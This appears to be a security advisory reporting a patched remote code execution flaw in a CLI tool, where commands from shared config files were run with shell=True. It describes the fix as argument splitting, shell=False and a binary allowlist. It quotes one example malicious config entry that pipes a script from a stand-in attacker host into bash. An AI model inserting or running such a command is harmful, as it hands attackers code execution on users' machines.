## CLI Tool Patches Critical RCE Flaw: Config File Import Could Trigger Arbitrary Code Execution
A high-severity remote code execution vulnerability has been identified and remediated in a command-line interface tool's quick commands handler. The flaw, rated CVSS 7.8, stemmed from the direct use of `subprocess.run()` with `shell=True` on commands parsed from user-supplied configuration files, creating a direct path for arbitrary shell execution if a malicious or compromised config were loaded.

The vulnerability resided in how the CLI processed YAML and TOML configuration files containing `quick_commands` definitions. When a user loaded a config file—potentially shared across teams, downloaded from repositories, or received from third parties—the tool would execute whatever shell command string was embedded in the configuration without sanitization. An attacker could craft a config file with an entry such as `quick_commands: [{command: "curl attacker.com/shell|bash"}]` and achieve full RCE with the privileges of the CLI process.

The fix introduces a dedicated `tools/quick_command_runner.py` module that fundamentally restructures command execution. The updated handler now parses command strings using `shlex.split()` to produce safe argument lists, executes subprocesses with `shell=False` to prevent shell injection, and validates binary paths against an allowlist of permitted executables. The module returns structured results containing stdout, stderr, and return codes for consistent error handling. The CLI's quick_commands handler has been updated to import and invoke this module rather than calling subprocess directly.

The exposure raises concerns around supply-chain trust in configuration files, particularly in development environments where `.dashrc` or `cli-config.yaml` files are commonly shared. Organizations using this CLI should verify they are running the patched version and exercise caution when loading configs from untrusted sources.
---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: RCE, CVSS 7.8, shell injection, subprocess, supply-chain
- **Credibility**: unverified
- **Published**: 2026-05-03 13:54:07
- **ID**: 79116
- **URL**: https://whisperx.ai/en/intel/79116